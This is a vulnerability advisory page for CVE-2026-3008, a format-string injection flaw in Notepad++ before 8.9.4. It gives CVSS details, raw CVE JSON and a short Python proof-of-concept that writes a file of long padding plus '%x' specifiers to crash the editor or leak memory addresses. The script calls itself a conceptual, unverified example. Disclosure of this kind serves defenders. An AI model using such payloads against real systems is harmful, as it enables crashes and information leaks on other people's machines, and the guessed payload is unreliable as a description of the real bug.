Security Vulnerability Report
CVE-2026-3008 CVSS 6.6 MEDIUM

CVE-2026-3008

Published: 2026-04-27 07:16:04
Last Modified: 2026-04-27 18:57:20
Source: 5f57b9bf-260d-4433-bf07-b6a79e9bb7d4

Description

Successful exploitation of the string injection vulnerability could allow an attacker to obtain memory address information or crash the application.

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Notepad++ < 8.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-3008 (Notepad++ String Injection)
# This script generates a file with a potentially malicious string pattern.
# Opening this file in a vulnerable version of Notepad++ may trigger a crash or information leak.
import sys


def generate_poc_file(filename):
    # Based on the vulnerability description, a long string or specific format
    # string might be needed. This is a conceptual example.
    # Adjust the payload based on specific technical analysis from the referenced GitHub links.
    # Example payload: A long string of 'A's followed by a format specifier
    # to test for memory read/crash.
    payload = "A" * 10000 + "%x" * 50
    try:
        with open(filename, "w", encoding="utf-8", errors="ignore") as f:
            f.write(payload)
        print(f"[+] PoC file generated successfully: {filename}")
        print("[*] Open this file in Notepad++ to test for the vulnerability.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")


if __name__ == "__main__":
    output_file = "cve_2026_3008_poc.txt"
    generate_poc_file(output_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3008", "sourceIdentifier": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "published": "2026-04-27T07:16:03.597", "lastModified": "2026-04-27T18:57:20.293", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Successful exploitation of the\nstring injection vulnerability could allow an attacker to obtain memory address\ninformation or crash the application."}], "metrics": {"cvssMetricV31": [{"source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-134"}]}], "references": [{"url": "https://community.notepad-plus-plus.org/topic/27500/notepad-v8-9-4-release-candidate", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/llgsjsm/cve-2026-3008", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17960", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://llgsjsm.github.io/cve-2026-3008/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-044/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/llgsjsm/cve-2026-3008", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}